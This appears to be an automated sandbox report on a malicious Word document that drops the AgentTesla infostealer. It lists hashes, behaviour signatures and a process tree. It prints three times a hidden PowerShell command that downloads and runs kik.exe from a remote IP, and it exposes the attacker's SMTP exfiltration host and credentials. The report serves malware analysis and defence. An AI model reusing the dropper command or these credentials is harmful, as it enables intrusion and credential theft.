Analysis

  • max time kernel
    298s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    27-09-2021 00:51

General

  • Target

    NEW PRODUCT DETAILS.doc

  • Size

    241KB

  • MD5

    7098066eab8807aa361fa1f0fdff57ca

  • SHA1

    d6534ac36458aafd6b4b52e6716903786fb6241a

  • SHA256

    ce54e81125eb44ed53dec51f69f439d692ec3fcbfa99be82886163b5c869e74b

  • SHA512

    9381147f59475aaf7d7a5cb4cd94371c337b22c85eea643ad9483f49210efd313a2c503701d6fd980a56d00cc95a2922af99312116adee195f75d5ce1ce999e6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://162.245.190.59/hit/kik.exe

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.owerbi.club
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    UCI1f;h9E?I9

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 39 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Program crash 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\NEW PRODUCT DETAILS.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://162.245.190.59/hit/kik.exe','C:\Users\Admin\AppData\Roaming\kik.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\kik.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:372
      • C:\Users\Admin\AppData\Roaming\kik.exe
        "C:\Users\Admin\AppData\Roaming\kik.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Users\Admin\AppData\Roaming\kik.exe
          "C:\Users\Admin\AppData\Roaming\kik.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 1480
          4⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://162.245.190.59/hit/kik.exe','C:\Users\Admin\AppData\Roaming\kik.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\kik.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Users\Admin\AppData\Roaming\kik.exe
        "C:\Users\Admin\AppData\Roaming\kik.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Users\Admin\AppData\Roaming\kik.exe
          "C:\Users\Admin\AppData\Roaming\kik.exe"
          4⤵
          • Executes dropped EXE
          PID:560
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 1476
          4⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:576
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://162.245.190.59/hit/kik.exe','C:\Users\Admin\AppData\Roaming\kik.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\kik.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Users\Admin\AppData\Roaming\kik.exe
        "C:\Users\Admin\AppData\Roaming\kik.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:808
        • C:\Users\Admin\AppData\Roaming\kik.exe
          "C:\Users\Admin\AppData\Roaming\kik.exe"
          4⤵
          • Executes dropped EXE
          PID:1836
        • C:\Users\Admin\AppData\Roaming\kik.exe
          "C:\Users\Admin\AppData\Roaming\kik.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1220
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1972

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      MD5

      25af219a70aa90f578206f1799eebfb7

      SHA1

      fc29c99a8d701e285821e9db549657409112aa03

      SHA256

      57dfbeee95c9b6c41d9eb959106a250d084565d956004e230d2778f8d9fe5b0c

      SHA512

      74ec5e0ec9764644454b44acaff48bf9784e41b7f58e2f44e3986afe5a0e928369f2822fdbbc768a9e49d7445d61fb6b5066980dcd685adc22c7af6cf16713ad

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      MD5

      25af219a70aa90f578206f1799eebfb7

      SHA1

      fc29c99a8d701e285821e9db549657409112aa03

      SHA256

      57dfbeee95c9b6c41d9eb959106a250d084565d956004e230d2778f8d9fe5b0c

      SHA512

      74ec5e0ec9764644454b44acaff48bf9784e41b7f58e2f44e3986afe5a0e928369f2822fdbbc768a9e49d7445d61fb6b5066980dcd685adc22c7af6cf16713ad

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • C:\Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • \Users\Admin\AppData\Roaming\kik.exe

      MD5

      a9dc973cb1d6029961397a76b560444c

      SHA1

      41d30f2f6c84722ec1ea68fc09b943604de85d05

      SHA256

      c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

      SHA512

      ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

    • memory/372-61-0x0000000001CF2000-0x0000000001CF4000-memory.dmp

      Filesize

      8KB

    • memory/372-60-0x0000000001CF1000-0x0000000001CF2000-memory.dmp

      Filesize

      4KB

    • memory/372-59-0x0000000001CF0000-0x0000000001CF1000-memory.dmp

      Filesize

      4KB

    • memory/372-57-0x0000000000000000-mapping.dmp

    • memory/560-114-0x000000000043774E-mapping.dmp

    • memory/576-118-0x0000000000000000-mapping.dmp

    • memory/576-130-0x0000000000800000-0x0000000000860000-memory.dmp

      Filesize

      384KB

    • memory/620-75-0x0000000000000000-mapping.dmp

    • memory/620-83-0x0000000000380000-0x0000000000381000-memory.dmp

      Filesize

      4KB

    • memory/808-110-0x0000000004C50000-0x0000000004C51000-memory.dmp

      Filesize

      4KB

    • memory/808-102-0x0000000000000000-mapping.dmp

    • memory/1220-133-0x00000000006C1000-0x00000000006C2000-memory.dmp

      Filesize

      4KB

    • memory/1220-129-0x00000000006C0000-0x00000000006C1000-memory.dmp

      Filesize

      4KB

    • memory/1220-120-0x000000000043774E-mapping.dmp

    • memory/1504-63-0x0000000000000000-mapping.dmp

    • memory/1504-66-0x0000000000830000-0x0000000000831000-memory.dmp

      Filesize

      4KB

    • memory/1504-68-0x0000000004970000-0x0000000004971000-memory.dmp

      Filesize

      4KB

    • memory/1504-69-0x00000000044A0000-0x00000000044EE000-memory.dmp

      Filesize

      312KB

    • memory/1620-53-0x0000000072E41000-0x0000000072E44000-memory.dmp

      Filesize

      12KB

    • memory/1620-54-0x00000000708C1000-0x00000000708C3000-memory.dmp

      Filesize

      8KB

    • memory/1620-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1620-56-0x0000000076B61000-0x0000000076B63000-memory.dmp

      Filesize

      8KB

    • memory/1824-82-0x00000000048A0000-0x00000000048A1000-memory.dmp

      Filesize

      4KB

    • memory/1824-71-0x000000000043774E-mapping.dmp

    • memory/1824-70-0x0000000000400000-0x000000000043C000-memory.dmp

      Filesize

      240KB

    • memory/1824-73-0x0000000000400000-0x000000000043C000-memory.dmp

      Filesize

      240KB

    • memory/1896-98-0x0000000004E30000-0x0000000005102000-memory.dmp

      Filesize

      2.8MB

    • memory/1896-96-0x00000000023E0000-0x000000000302A000-memory.dmp

      Filesize

      12.3MB

    • memory/1896-92-0x00000000023E0000-0x000000000302A000-memory.dmp

      Filesize

      12.3MB

    • memory/1896-85-0x0000000000000000-mapping.dmp

    • memory/1896-94-0x00000000023E0000-0x000000000302A000-memory.dmp

      Filesize

      12.3MB

    • memory/1912-93-0x00000000023F1000-0x00000000023F2000-memory.dmp

      Filesize

      4KB

    • memory/1912-97-0x0000000004D60000-0x0000000005032000-memory.dmp

      Filesize

      2.8MB

    • memory/1912-95-0x00000000023F2000-0x00000000023F4000-memory.dmp

      Filesize

      8KB

    • memory/1912-91-0x00000000023F0000-0x00000000023F1000-memory.dmp

      Filesize

      4KB

    • memory/1912-84-0x0000000000000000-mapping.dmp

    • memory/1972-131-0x0000000000000000-mapping.dmp

    • memory/1972-132-0x000007FEFC4F1000-0x000007FEFC4F3000-memory.dmp

      Filesize

      8KB

    • memory/1984-109-0x0000000000760000-0x0000000000761000-memory.dmp

      Filesize

      4KB

    • memory/1984-99-0x0000000000000000-mapping.dmp